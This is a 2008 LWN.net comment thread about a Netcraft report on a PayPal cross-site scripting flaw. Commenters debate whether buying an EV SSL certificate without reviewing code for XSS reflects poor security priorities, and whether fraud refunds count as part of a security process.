PayPal XSS Vulnerability Undermines EV SSL Security (Netcraft) [LWN.net]

PayPal XSS Vulnerability Undermines EV SSL Security (Netcraft)

Posted May 19, 2008 23:48 UTC (Mon) by proski (subscriber, #104)
In reply to: PayPal XSS Vulnerability Undermines EV SSL Security (Netcraft) by clugstj
Parent article: PayPal XSS Vulnerability Undermines EV SSL Security (Netcraft)

Actually, the article doesn't say anything about PayPal reaction to the issue.

(Log in to post comments)

PayPal XSS Vulnerability Undermines EV SSL Security (Netcraft)

Posted May 20, 2008 11:56 UTC (Tue) by tialaramex (subscriber, #21167) [Link]

I believe the poster you're responding to means that PayPal spent money buying an EV
certificate (though by PayPal's standards it would be cheap) to re-assure users that they're
secure, but they didn't put the effort into security-by-design that is a necessary first step
before worrying about having the right kind of SSL certs.

Thus no "response" is needed, PayPal's priorities, like Microsoft's ten years ago, are quite
transparent and should warn security conscious people to stay miles away.

PayPal XSS Vulnerability Undermines EV SSL Security (Netcraft)

Posted May 20, 2008 19:22 UTC (Tue) by martinfick (subscriber, #4455) [Link]

Why's that?  When it comes down to it, technical security features are nowhere near as
important as their security process.  After all, as a user who cares what security features
paypal uses?  What matters is what they do if someone commits fraud or steals from your
account.  Just because paypal thinks that it is important to give the impression of security
to their customers, does not mean that they will not have very good customer service policies!
I am in no way implying that they do or don't have good customer service policies, simply that
it really is unrelated to their technical security mechanisms.

PayPal XSS Vulnerability Undermines EV SSL Security (Netcraft)

Posted May 21, 2008 10:07 UTC (Wed) by tialaramex (subscriber, #21167) [Link]

I agree that the process is the correct unit of security, but I think it's a mistake to
include all "customer service" in the security process per se.

When your bank replaces money which was fraudulently taken from your account that's not part
of a "securty process" it's just a customer retention measure or a legal obligation. If the
bank is able to revert the fraudulent transfer then /that/ might be part of a security
process, or if they're able to  identify where the money went and alert a local subsidiary to
call in the police, /that/ could be part of the security process. But just giving the customer
money so he'll stop whining isn't security.

PayPal's wider process is at fault here too, they've been telling customers that their EV cert
means better security and that they can trust the PayPal web site, but it turns out that this
wasn't actually true.

Also, "customer service" responses to fraud aren't a free lunch. If your friends routinely
fall for web-based PayPal fraud and have to recover the money through some sort of customer
service process, you can be sure that PayPal is ensuring their fees cover that "cost of
fraud". If the company is well run the executives /should/ realise that making the site secure
would be cheaper than paying for escalating rates of fraud, but I'm not comfortable assuming
that an effective monopoly like PayPal thinks that way.

PayPal XSS Vulnerability Undermines EV SSL Security (Netcraft)

Posted May 22, 2008 14:37 UTC (Thu) by clugstj (subscriber, #4020) [Link]

Thank you, that is exactly what I meant.  They bought the EV cert and touted that it increased
security, but didn't review their code to see if there were any XSS vulnerabilities in it
(apparently).